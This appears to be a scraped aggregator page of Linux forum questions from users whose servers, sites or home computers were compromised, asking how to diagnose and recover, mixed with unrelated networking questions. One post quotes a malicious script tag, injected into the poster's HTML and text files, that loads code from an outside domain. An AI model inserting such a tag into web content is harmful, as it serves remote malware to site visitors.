Ubuntu Security :: Server Hacked - Ethernet No Longer Working

Jun 19, 2010

My server (Ubuntu 10.04 desktop) was hacked. I had my ethernet plugged in to an Intel 82557 Ethernet Pro card (Pulse) when my server was first attacked. After it was attacked I reinstalled the system but my ethernet card still would not work. Ubuntu recognized it, but it is continually disconnected and the little status lights on the card do not light up anymore.

So then I plugged the ethernet into the motherboard itself. Well, my server was hacked again and now the ethernet on the motherboard does not work. Again, Ubuntu (after a reinstall) recognizes the hardware but nothing happens when I plug the ethernet in. The motherboard is a BioStar P4M900 VIA chipset. I have a few of the system logs here [URL] which I saved right after the first attack.


Security :: Server Hacked By Opyum?

Apr 11, 2011

Awoke to millions of failed SSH attempts into my public server. Behind a firewall which forwards only SSH and HTTP. Local iptables deny everything except SSH and HTTP. Exact same symptoms and results as Chris over at his site: here. I just want to know how they managed to execute a script, or make changes etc? Here's some info: According to cat /var/log/secure | grep "Accepted" no one besides myself gained entry via SSH. The FTP account (500:48 (Purposely in apache group)) is chrooted to a 775 directory and vsftpd does not accept anonymous entry. vsftpd and xferlog's are empty?

Code:
You have new mail in /var/spool/mail/root
[root@dev etc]# tail /var/spool/mail/root

[code]....


Security :: The Server Was Hacked From So Called Tor IP Address?

Nov 14, 2010

I always use professional services to secure my servers. Everything was fine for years but a week ago my server got hacked. I don't know how the hacker got my username/password - it was not something like admin, password. 9 months ago my PC was infected with some virus which connected to the FTP server by using password which was saved in CuteFTP and infected all index files with some javascript. Then I changed the user/FTP password and didn't save it anymore in Cute FTP. Of course, I checked all the folders and re-uploaded all infected files. Is it possible that this virus uploaded some hidden file which was able to get the new password for this account?

The server was hacked from so called Tor IP address. I am tired of worrying about server security and now have an idea to get a static IP address from my ISP and to allow logins only from this IP address. What do you think about it? This idea looks good to me but are there any risks of losing access to the server? Can the ISP change the static IP address for some reason?


Security :: Server Hacked - Finding Process Behind Sending Emails

Jun 13, 2011

I just got control over a server that was hacked several months back. The other day we started receiving rejected emails sent from my server to a yahoo email address that is no longer active that contained users' login information. I am trying to find the process that is sending these emails. So far it's been like finding a needle in a haystack. The email that is being sent is appending the login information each time it is sent so there must be a local file that contains this information. I have tried using grep and find without any luck.


Ubuntu Security :: Secure A Terminal Server, So That It Can't Be Hacked By Bruteforce/dictionary Tools?

Oct 8, 2010

How to secure a Terminal Server so that it can't be hacked by bruteforce/dictionary tools?


Security :: Qmail Hacked In Server \ Cannot Find Any Suspicious Script Running Using Ps Xaf Command?

Jan 3, 2011

My server is probably hacked and sending spam emails. I see them randomly in maillog (/usr/local/psa/var/log/maillog, server has a plesk panel), sometimes a few in a long time, sometimes a lot of them. Here is a sample of it:

Jan 4 00:47:08 acv360 qmail-remote-handlers[17662]: Handlers Filter before-remote for qmail started ...
Jan 4 00:47:08 acv360 qmail-remote-handlers[17662]: from=root@acv360.com

[code].....


Security :: Server Hacked When Try To Log In Type Root But Won't Let Type A Password?

Jun 22, 2010

I have a server hacked. When I try to log in I type root but it won't let me type a passwd. There are no services up, can't see page, mail, nothing.


Ubuntu Security :: Using Lucidlynx - How To Know If Some One Hacked My Box

Mar 8, 2010

I want to know if anyone hacked or is getting into my computer. I am using lucidlynx right now. My computer is directly connected to the modem, not using any wireless router. How can I check if someone hacked it? How to prevent it?


Ubuntu Security :: System Hacked / What's Going On?

Jan 3, 2011

I have a 6yo laptop...z60m. Solid little thing that I knocked around so much the hinge broke. My dad jerryrigged it so it can stay open.

So now I use it as a glorified DVD player. Then, around February the hard drive died. I put it in fresh, loaded a couple of regular games and the DVD modifications to play DVDs. So, besides the basic upgrade to 9.1 not much has been done.

Well, last week my panel disappeared. I procrastinated and last night I got on the computer. I did F2 and "xfce-panel" and my panel reappeared exactly how I'd last tweaked it.

With one exception. This blue globe, "Akonadi" had mysteriously appeared.

Thing is that I haven't installed or updated anything for 8 months...why? Because I haven't had this thing connected to the Internet. The wireless tower has been on (my bad) but all of the signals in my neck of the woods are encrypted so I just let it be.

I don't know where this program came from. Is it loaded in xubuntu? Why would it show up? And furthermore, could someone with malicious intent (unfortunately I do have to take that into consideration) have put this on for data collection?


Ubuntu Security :: My Computer Is Being Hacked / What To Fix It?

Feb 27, 2011

I have a Windows computer and it is being hacked. About a month ago or more someone hacked my router and installed new firmware from Firmware Version: Talisman/Basic V1.2.9a

My router is Linksys and the SSID got changed to sveasoft. I had WPA set up and MAC filtering.

Someone hacked my router and changed the Firmware Version. And the user name and password also got changed to just admin.

Well now I got a pop up from my Kaspersky saying network attack scan.generic.TCP 74.63.245.168

only thing I can find on it http://whatismyipaddress.com/ip/74.63.245.168

It is Limestone Networks in Dallas.

Some strange things have been happening to my computer in the past 4 months and it is getting worse.

I have no firewall or router now. And I have not gone to the store to get a new router yet, and I'm thinking of formatting my computer and putting linux on it and getting a good firewall like zone-alarm.


Ubuntu Security :: Warning Signs Of Having Been Hacked

Feb 19, 2011

I had a serious breach of the cellular segment of my communications network this week. All I can say is nobody got hurt. The attackers also knew where to find me via email. I'm concerned that perhaps they've penetrated this aspect of my system as well, although they seemed pretty specifically focused on the phone. There have been no changes on anything on my computer, and of course, I went ahead and changed all the passwords. How can I verify or at least look into the possibility of having been hacked as well.


Ubuntu Security :: Computer Has Been Hacked / Monitored?

Mar 22, 2011

My computer has surely been hacked for at least more than two months; my private information is being hacked and spread around! I initially used Windows Vista and I had the firewall off and no antivirus software. When I realized that my OS had been hacked, I began turning my firewall on and installing security software, but nothing stopped the hack.

Yesterday, I erased all my partitions and installed Ubuntu 10.10. I installed rkhunter and a firewall. I changed my static IP address, at least for the sake of knowledge, to another one, then I got disconnected since my router only allows my old IP.

When I'm about to write my admin password, I disconnect from the network. I've scanned my system using rkhunter, and the result is a list of 30 suspicious files!

Can I adjust my router in a way that it can allow any IP address? If yes, can I have a non-static IP address? How to prevent the hacking in the first place? However, I believe, I don't know yet, that my Ubuntu has also been hacked...

If I can't get rid of the hacker(s), then I should permanently disconnect from internet and find another way to receive information anonymously through the internet.


Security :: LAN Hacked - How To Find Infected Machine

Jul 3, 2009

I have a LAN with 20 machines. I see that one of them is infected. It's sending a lot of packets to the internet. My internet connection at this moment is really slow. What should I do? How to detect which machine is infected? I'm using a hardware firewall. Fortigate... It's hard to configure nice logs there. Any good software? I don't want to unplug the network cable from each machine and check.


Ubuntu Security :: Can Be Hacked When It Is Installed As A Dual Boot With Windows7

Apr 13, 2010

I need to know whether Ubuntu can be hacked when it is installed as a dual boot with W7 by hacking windows and getting access to the Ubuntu partition?

What I would also like to know if this way can be used to put a key logger or screen capture in Ubuntu which installs next time Ubuntu is started?


Ubuntu Security :: Virus In Windows Reformatted HD - Still Facebook Hacked

Apr 28, 2010

I believe it is a keylogger because my Facebook account has been hacked, I believe my email has as well. I heard that even if you reformat a hard drive, the virus could still sit there and apparently that is what happened to me. How to be rid of it and keep my security? I installed RKhunter and Chkrootkit. Rkhunter reports warning files while checking my filesystem. I can post a log if need be.


Security :: Nmap Returns Many Non Existing Local Ip -- Hacked?

Nov 18, 2010

A scan on my computer reported as up many local IPs which simply do not exist in my network. This host is supposed to have IP 192.168.0.4, but all the other IPs should not be there. I have a USB modem connected to a Linux box, itself connected to a wifi Linksys router and that's it.

# nmap -sP '192.168.*.*' | grep -v down
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2010-11-18 21:46 CET
Host 192.168.0.4 appears to be up.
Host 192.168.7.27 appears to be up.
Host 192.168.10.0 appears to be up.

[Code]...


Security :: Site Definitely Hacked - Can't Delete Files To Restore Backup

Apr 9, 2010

I've discovered that after restoring my site's backup this has happened to me again. How to delete the hacked /home/crocbits directory so that I can restore the backup under the same username. When I try to delete /home/crocbits I get this message when logged in as root:

[Code]...


Security :: Site Hacked - Deleting Specific Line From Files Recursively?

Apr 26, 2011

I just got an email from Google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed it's recursively in all my .html and .txt files in my website. Can I make a linux script to run that will go through all my .html and .txt files recursively and delete that line from them? I don't know how it got in all of them.


Ubuntu Networking :: Ethernet Card Not Working In 10.04 Server

Jul 18, 2010

I've set up 10.04 Server so that I could install directly to a command line, due to the fact that Desktop was crashing during the install every time. The installation goes fine, except for the networking portion. DHCP fails every time I try it. So I set up a static IP as an alternative. Once installation completes, none of the network-oriented tools (ping, telnet) work. I've tried pinging my router and I get 'Destination Host Unknown'. This is true if I change to a DHCP oriented setup as well.

The router sees that the machine is there, as indicated by the slowly blinking connection light meaning that it's hooked up to *something* but there's no activity. Also, networking did work within Windows before I nuked it, so I know it has the ability to operate correctly. I'm at a loss, mostly due to my own newness and ignorance of how to start tackling this within this environment.


Server :: BIND Server No Longer Working

Jun 8, 2011

I am still quite new to all this but I guess we were all beginners once, this forum seems very helpful. Here is my situation, I will give as much detail as I can. I have a dedicated server which is running CentOS release 5.5. Initially I had Plesk installed, but when I upgraded PHP I damaged the Plesk configuration, and so I installed Webmin instead.

All seems to be fine with this, apart from the DNS configuration / BIND server. I know this because I have one site which uses an external DNS server and this works fine (i.e. I can access it from a browser). All the others don't resolve - i.e. the ones I set up in Plesk. I've done a bit of investigating to see what is going on, but I'm stabbing in the dark a little.


Server :: Centos 5 Hacked Again?

Apr 7, 2011

My server is a web server with CentOS 5 & parallel 9. I don't know why all web sites on this server have had a home page added which is not mine. Even the mysql admin is also redirected to another site. What can I do?


Debian Configuration :: Server Has Been Hacked?

May 25, 2011

Let me start by saying it's a school assignment, and therefore not a real world situation. Nevertheless, I would appreciate any help I can get. The company ProvidIT has contacted us, their website has been hacked. Instead of their normal website, it shows "Buy creditcard details online, click here" (cc4u.jpg). A classical defacement. The following offenses also might have been committed. So it's our job to find evidence for those offences. (I had to translate the Dutch law articles, so they might not be 100% accurate legally speaking, but you get the idea)

- Unlawfully accessing automated systems
- Copy or tap (eavesdrop) data after hacking
- Unlawfully access or use system resources of a 3rd party computer

[code]....


Fedora Networking :: Ethernet Connection Stopped Working - Cannot Find Server

Jul 23, 2009

After using Fedora 11 for a month or two now the ethernet gave out on me tonight. However if I switch to my Ubuntu or Windows XP install it runs fine. I made no recent changes to network connections, and installed no programs that should affect it.

kernel version: 2.6.29.6-213.fc11
default connection: eth0(and only connection)
ifcfg-eth0:
# Networking Interface
DEVICE=eth0
BOOTPROTO=dhcp
HWADDR=00:1F:C6:DB:05:0C
ONBOOT=yes
TYPE=Ethernet
IPV6INIT=no
USERCTL=no
NM_CONTROLLED=yes
NAME=eth0
UUID=5fb06bd0-0bb0-7ffb-45f1-d6edd65f3e03
DNS1=192.168.1.254
PEERDNS=yes
PEERROUTES=yes

I have tried, restarting, older kernel, restarting services, and clearing the DNS Cache. The specific error I get is that "Firefox can't find the server", and most other applications return similar. I can however ping websites still. All other computers on the network are running fine, and booting into another system the internet will work. Just not for fedora.


Server :: Localhost Has Stopped Working / With Or Without Internet Connection Via An Ethernet Cable?

Apr 2, 2010

I have been using my laptop as a development machine for a few months now, developing php/mysql applications, and testing them offline via the same laptop by pointing the browser to url.

But a few days ago, my url stopped working and I discovered that it will now only work if I have an active internet connection plugged in. Why has this happened and how do I fix my test server so localhost works with or without an internet connection via an ethernet cable?


Ubuntu Networking :: Atheros AR8132 Ethernet No Longer Detected?

Mar 1, 2010

I have an absolutely bizarre hardware issue (concerning the Atheros AR8132 PCI-E Fast Ethernet Controller) that has been giving me quite a bit of grief for a while, and having completely hit a wall on this one, I'm a reasonably-experienced Linux user of several years, and have been running Ubuntu 9.10 on an Acer AOD250 netbook for several months out. I know that this model has wireless issues out-of-the-box (easily fixed), but it did not have any noticeable ethernet issues. That is, until I attempted an installation of Arch Linux.

During the Arch Linux installation, the ethernet card was initially detected, but unable to be used (because of a bad module in the kernel released with the installer). As I didn't know the fix for this at the time, I decided to reinstall Ubuntu 9.10. This time, however, the system failed to recognize the wired ethernet whatsoever. Instead, the external activity lights for the port (green and orange) are ALWAYS on, yet the device doesn't function.

I have done a successful install of the latest drivers directly from Atheros for the device and have them automatically loading with the kernel during boot, but as the device isn't recognized, the drivers aren't doing any good. Relevant information:

Code:
root@niobium:~# lspci
00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03)
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03)
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03)

[Code]...


Ubuntu Security :: TrueCrypt Volume Is No Longer Bootable

Jul 16, 2010

I installed TrueCrypt in Microsoft Windows XP SP3 (no Linux installations present) and I stopped the TrueCrypt service in the Windows environment, and then I restarted, and all of a sudden it seemed the PC could not see the hard disk at all at startup, nada... I believe I dismounted it by stopping the TrueCrypt service... So the PC no longer understands there is a TrueCrypt volume in place, and I inserted the TrueCrypt recovery disk, and it can not do anything. I restored the bootloaders, the TrueCrypt loader, and once I finished this, I pressed ESC, and it says there are no bootable devices, so nothing. I even decrypted the disk, and it seemed that nothing happened with the restore disk...

Is there any way I can make this partition bootable again? Because I have everything in that partition, every single bit of life... I have used TestDisk under Linux right now, but I am unsure of this, and I also further complicated the boot process, and now the PC states at startup that partition tables are missing. When I start TrueCrypt from this Kubuntu live CD, I am unable to see the encrypted hard disk even with root, there is no way to see this hard disk, it can only be seen in the TestDisk app. I really am desperate; at least, if I can not make Windows boot again, maybe just suck all the files out of the hard disk and put them somewhere for now. I really need to get back to work, and I can't seem to find a solution...

I know here at Ubuntu forums, someone may have the solution. And I do know for sure all the files on this volume are there because of the TestDisk app, so they are there, they are just not reachable.... (I have posted this problem on a Linux forum instead of a Windows forum because the only way to try to recover the volume is with the Linux Kubuntu Live CD)


Security :: How Can Authenticate Ethernet Users Before They Use Network?

Nov 22, 2010

Is there any solution for authentication of ethernet users? Something similar to daloradius for wifi. I don't want to use pppoe. Is there any way to connect daloradius with a dhcp server, so when a certain mac address asks for an IP, daloradius will first look if it is allowed?


Ubuntu Security :: After Booting Up From The Restored Filesystem - Sudo Would No Longer Work

May 28, 2010

I'm having some trouble using sudo - it did work fine, but now when I try to use it, I have the following error:

I understand that I have to modify /etc/sudoers but need to have root access to do this. I am using a bootable USB (lucid) with persistent changes and am unable to login as root, because I don't know the default root password, and am unable to use sudo to change it.

The problem occurred after I had some corruption to the casper file system, so I booted into Windows, moved the casper-rw file to another location on my flashdrive, and used a 1GB backup filesystem to repair the corrupt one using fsck.

After booting up from the restored filesystem, sudo would no longer work.


Ubuntu :: TV Grab Not Working Any Longer?

Jan 18, 2010

I noticed that tv_grab is not working any longer. It seems that they do not update the pages. It has been a problem for a long time.


Ubuntu :: Compiz No Longer Working?

Mar 18, 2010

I have been using some of the compiz effects now for just over a week with no problems, but yesterday they stopped working for what seems to be no reason. I have the recommended nVidia driver installed, here is my graphics card from lspci:

Code:
01:00.0 VGA compatible controller: nVidia Corporation G72 [GeForce 7300 LE] (rev a1)

I right clicked on my desktop, and went to 'Change Desktop background', then visual effects. This has been set to None. I cannot change this to Normal or Extra, as I get an error saying

Code:
Desktop effects could not be enabled

I have followed another thread which explained how to uninstall and reinstall compiz, but it did nothing.








Copyrights 2005-15 www.BigResource.com, All rights reserved